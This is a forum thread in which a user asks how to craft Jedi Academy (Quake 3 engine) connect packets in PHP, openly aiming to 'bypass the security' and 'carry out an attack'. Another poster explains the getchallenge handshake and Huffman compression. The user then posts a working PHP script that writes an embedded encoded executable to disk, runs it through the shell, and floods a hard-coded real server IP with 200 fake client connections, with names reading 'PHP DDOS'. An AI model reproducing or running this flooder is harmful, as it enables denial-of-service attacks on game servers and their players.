Jedi Academy Connect!?

euphoria · **Joined:** 04 Oct 2010 09:31 **Posts:** 10

Hi Aluigi!
What should be a package (\ xFF \ xFF \ xFF \ xFFconnect \ x00) for the game Jedi Academy?

I just want to make the same with PHP
Tried to decode a q3huffdecenc, but nothing good will come ... apparently my sniffer bad (maybe)

As you can decode and encode .... connect back?
How are they encrypted?
Just have the desire to make this further through a proxy server (to bypass the security)

http://translate.google.ru translated from Russian

aluigi · **Posted:** 04 Oct 2010 14:18

an idea could be using q3ts as explained here:
post10947.html#p10947

euphoria · **Joined:** 04 Oct 2010 09:31 **Posts:** 10

Received, that such a result:

Code:

????????connect "\challenge\1234567890\qport\18468\protocol\26\name\Padawan\rate\24000\snaps\38\model\mara_ponytail/default\forcepowers\7-1-030000000000000330\color1\4\color2\4\handicap\100\sex\male\cg_predictItems\1\saber1\dual_1\saber2\none\char_color_red\255\char_color_green\255\char_color_blue\255\teamtask\0"

But when you send all of this, the server responds:

Code:

Server uses protocol version 26

I sent the "connect" with no encryption.
Perhaps because of this there is this error?

aluigi · **Posted:** 06 Oct 2010 15:11

you need to compress the part after "connect" (from offset 12) with huffman as you must do for almost any q3 game.
in my code I use ever the q3huff.h code:
new_size = Huff_CompressPacket(packet, 12, old_size);

euphoria · **Joined:** 04 Oct 2010 09:31 **Posts:** 10

<?
$ip = '86.110.181.156';
$port = 29070;

$s = fsockopen("udp://$ip", "$port");
fwrite($s, "\xFF\xFF\xFF\xFFgetchallenge\x20");

/*q3huffdecenc.exe*/
$str = "ff ff ff ff 63 6f 6e 6e 65 63 74 20 01 2a 44 74
30 8e 05 0c c7 26 c3 14 ec 8e f9 67 30 1a 26 c1
4c 58 00 eb c3 76 b0 2f 1c 03 67 c3 90 c2 d1 71
08 ec 15 27 c3 45 a3 9b 8d f2 dc b2 c7 e6 c9 f1
a3 24 63 8b 29 28 54 8e 09 39 dc ad e5 7e 96 f5
94 8a 59 89 33 bc 18 ad 37 eb 9b ac 65 df a5 c3
e8 67 a7 05 cf 41 19 cb 97 41 bf 8a 89 19 13 5c
71 54 ec 7b d5 e9 6b 7b 6b 7a 36 b4 0b e8 5c e6
13 ed d9 23 a9 7c a4 3a e3 c5 bd 7d 1b 17 cc bf
fc e6 6d c2 fd ae a7 06 49 39 99 c6 23 c7 02 27
e1 de e2 e7 fb 32 e9 1a 49 67 c7 19 16 34 0b 8c
0c 74 c5 f1 fc 65 8c 9a b2 0e 63 8c 1a cf bc 2e
0b 47 bf b2 27 c5 73 4e b3 72 a9 95 03 0c 4c ef
91 aa 9b 90 2f 9e af 6c 51 f0 ef 25 d5 5f 97 26
d3 63 92 3b f3 a5 7c ac bd bc 00";
/*q3huffdecenc.exe*/

$str = str_replace("\r\n"," ",$str);
$str = explode(" ",$str);
for($i=0;$i<=(count($str)-1);$i++){
$res .= chr(hexdec($str[$i]));
}

fwrite($s, $res);
$var[1] = fread($s, 1024);
$var[2] = fread($s, 1024);

echo $var[2]; #????????print No or bad challenge for address.

?>

Here's what happened ...
I sent an encrypted package ...

the first request I received ".... challengeResponse 756858973 "
second query, I get ".... print No or bad challenge for address. "

obtained to carry out an attack, you want to insert
desired challengeResponse?
encrypt it? and to send?

aluigi · **Posted:** 07 Oct 2010 14:25

obviously if you don't use the correct challenge received it will never work, so:
- send getchallenge
- receive challengeresponse and take the number
- build the connect packet using \challenge\number_received
- compress it
- send it

euphoria · **Joined:** 04 Oct 2010 09:31 **Posts:** 10

Bad that PHP has no compression Huffman
I used some PHP classes
However, they incorrectly coded ...

If I do not find the right class, you will have to postpone this venture (
Or find a host to host your code there.
And remotely ready line to be sent later.

euphoria · **Joined:** 04 Oct 2010 09:31 **Posts:** 10

<?php
$ip = '90.189.192.33';
$port = 29070;
$num = 200;
set_time_limit(666);

/*huff.h Luigi*/
$q3huffdecenc = (split("\r\n",(gzuncompress(base64_decode('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
gNYXP9QVUw1K+cH/v77cziet/S+XDhXs
')))));

$var = (split("\r\n",(gzuncompress(base64_decode('eNpdj0tuwzAMRK9SZB9Ukj9xj9BdDjCAwciME1QmVUlG2tO7StpFUK6Gj5gZcNu2zasI+/Kyg79Q
CCwzw7qm7frD8GbwGTUV2KHtB8SkRb0GuB5CC+NIE91IkKgwXGuMQRaKGc2ARScOWCjRGFW+C13D
68RnWkPBWZPnqDdOGYe93ZvGPE/TGNQaTRbtr3BVXEimq6cIe6/hr5odGH4eY+J6KO+FlwyLTCeu
zmmlMP5tDqLC9wfT+MgbqwWu657RnJjlPzyFlR+sMC2F8gfM7gcSjXDq
')))));
fwrite(fopen('q3huffdecenc.exe','w'),$q3huffdecenc[0]); # q3huffdecenc.exe
$gh = $var[0];
function name($name,$ip,$port,$gh){
fwrite(fopen('huff.txt','w'),$gh); # String SEND(write)
$huff = fread(fopen('huff.txt','r'),filesize('huff.txt'));
$ff = fsockopen("udp://$ip", "$port"); #sock

$packet = '????????getstatus ';
fwrite($ff, $packet);
$str = fread($ff, 4000);
$players = floor((substr_count($str, "\n")-2)); #??????-???? ??????????????
$tr = explode(base64_decode('Cg=='), $str);
$array = explode(base64_decode('XA=='), $tr[1]);
$strtolower = explode(base64_decode('XA=='), strtolower($tr[1]));
$sv_maxclients = $array[(array_search(strtolower('sv_maxclients'),$strtolower)+1)] ;

echo $players.'!'.$sv_maxclients;

fwrite($ff, "\xFF\xFF\xFF\xFFgetchallenge\x20");
$sp = explode(' ',fread($ff,1024));
$string = explode("\\",$huff); #2 - challenge 8 - name
$string[2] = $sp[1]; # challenge
$string[4] = rand(10000,99999); # chellenge
$string[8] = $name; # name
echo "<PRE>";
print_r($string);
echo "</PRE>";
$write = implode("\\",$string);
echo $write;
fwrite(fopen('huff.txt','w'),$write);
$str = `q3huffdecenc e huff.txt`; # HUFFMAN Luigi
$s = explode('ff ff ff ff 63 6f 6e 6e 65 63 74 20',$str);
$s = explode("\n",$s[1]);
for($i=0;$i<=count($s);$i++){
$r_ = explode(' ',$s[$i]);
$r .= $r_[0];
}
$hex = str_replace(' ','', $r);
for($i=0;$i<=strlen($hex);$i++){
if(!($i%2)&&$hex[$i]!=null){$j .= '\x'.strtoupper($hex[$i]);}else{$j .= strtoupper($hex[$i]);}
}
$res = explode('\x',$j);
for($i=1;$i<=(count($res)-1);$i++){
$rs .= chr(hexdec($res[$i]));
}
$connect = '????????connect '.$rs;

if($players<$sv_maxclients)fwrite($ff, $connect);
else
sleep(1);

fclose($ff);
}

for($e=0;$e<=$num;$e++){
$name = "^7PHP DDOS by ^^".rand(1,8)."Euphoria";
name($name,$ip,$port,$gh);
}

?>

Poor implementation in PHP ...
Because PHP takes the result of your program "q3huffdecenc.exe"

That is, PHP creates a "q3huffdecenc.exe, huff.txt".
Then read "HUFFMAN" result.

Connection to the server occurs. Well.
But I can not understand! what algorithm is used in your program.

Adaptive "HUFFMAN"?
OFFSET 12? What is it?
I could not achieve that result.
Encodes is not the way it does "q3huffdecenc.exe"

Can you tell me how to code like this line ...

String - AASD
? Please, just want to make the implementation in PHP all the way!

euphoria · **Joined:** 04 Oct 2010 09:31 **Posts:** 10

Now I know that the "Offset"
But is it really uses adaptive Huffman?

aluigi · **Posted:** 12 Oct 2010 22:39

don't know, anyway in the past I tried some other huffman algorithms but they didn't work, but it's enough normal with compression algorithms

euphoria · **Joined:** 04 Oct 2010 09:31 **Posts:** 10

I understand you yourself wrote
huff.h? And maybe you know
exactly what algorithm is used:
static, adaptive or dynamic
Huffman.

aluigi · **Posted:** 13 Oct 2010 10:08

oh no no, it's just the one of id software, I simply changed some micro things to make it usable without problems

euphoria · **Joined:** 04 Oct 2010 09:31 **Posts:** 10

Clearly, the bad, that I do not know
this programming language. I can
not understand the algorithm.
Thanks Luigi!

Luigi Auriemma

Jedi Academy Connect!?